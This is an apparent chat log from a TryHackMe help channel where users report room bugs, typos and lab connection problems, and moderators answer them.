for the fun of it I tried uploading a script from one of the writeups (and even the rev-shell from the author of the room - same problem
lime yarrow
did try to restart the server a few times
celest root
Hi all, I am working on XSS exploitation on the XSS Playground Room. I am on Task 5 DOM Based XSS, I was able to get the onmouseover to work and display my cookie on an alert pop-up... but I see no flag to enter for the answer... I am unsure what to do
restive sparrow
am having an issue with the bounty hunter box. i cant seem to download the files from the ftp server. i tried wget to download the files but it wasn't successful, the connection was successful but ended up hanging after
green heart
im doing the upload vulnerabilities room on my VM and im getting an error when trying to load overwrite.uploadvulns.thm or the ip of the room
im getting server not found
eternal summit
@green heart #room-help
Not a bug, you've missed a step
You're not meant to access it by IP either
green heart
i see, thank you
wheat fractal
Little typo in the Task 2 of " What is Networking " that just have been released by cmnatic, it's Tim Berners-Lee not Bernes
dusky junco
Little typo in the Task 2 of " What is Networking " that just have been released...
Resolved, thank you (:
livid escarpBOT
Gave +1 Rep to @night yew
wheat fractal
Resolved, thank you (:
You're welcome, thanks to you too CM 
livid escarpBOT
Gave +1 Rep to @dusky junco
steady shuttle
Hello
On the new release room
at the ending
the href to Extending Your Network room
is including room too
dusky junco
Updated π ty
livid escarpBOT
Gave +1 Rep to @steady shuttle
steady shuttle
You're welcome π
chrome yacht
red pill also works and then the format is correct :)
blissful tiger
Hello, I found a bug on the room Smag Grotto., which will reveal the root flag to the user without gaining root.
Should I DM someone, or how should I report the bug?
thx
eternal summit
@sonic willow if you're interested
sonic willow
o that's a throwback
sonic willow
<@180392440945967104> if you're interested
thank you:)
livid escarpBOT
Gave +1 Rep to @eternal summit
sonic willow
Should I DM someone, or how should I report the bug?
hey sure, i made the room, drop me a dm
blissful tiger
<@180392440945967104> if you're interested
Thanks
livid escarpBOT
Gave +1 Rep to @eternal summit
misty kestrel
I think there is a bug in the Packets & Frames room. I am putting in the correct s,sa,a form for the three way handshake and it is not taking the answer.
civic brook
I think there is a bug in the Packets & Frames room. I am putting in the correc...
it should work with no spaces
misty kestrel
Spaces.... THank you!
paper fjord
I'm getting an "internal server error" on the OWASP Top 10 room, Task 26.
I try to click on the "feedback" link, get that error, and the "encodedpayload" cookie never shows up.
I've also tried to search for it with "{ip}/feedback"
untold mural
I'm no English major, but I think this is meant to be caused? Room: DNS Manipulation, task 8
woeful jewel
I'm having trouble connecting to the attackbox at burp suite room
The deployed attack box is laggy and sometimes the mouse moves on its own
I didn't click anything yet the mouse cursor close a window
I tried switching device, and it's still laggy
The other rooms isn't as laggy as this one
Nvm the other rooms are just as laggy
untold mural
this room has a lot of issues
fading warren
idk if it's normal but i get the error : Microsoft Windows [Version 10.0.17763.1637] on the Wreath room task 40 when i try to get the reverse shell
rapid quail
i received 1 badge 6 times(cat Linux.txt). is this bug or ....?
inner minnow
Re : room Brainstorm, does anyone know why port 3389 is open ?
willow topaz
On the room Kenobi (Task 3 Gain initial access with ProFtpd) second question the number of exploit changed from 3 to 4
white osprey
https://tryhackme.com/room/iso27001 Should say "Requirements"
^+ Not to sound rude, not sure on the best way to phrase it but this box could do with a few spelling/grammar checks.
hazy tiger
Hey! That's not a problem, if I just bug @dusky junco to come take a look π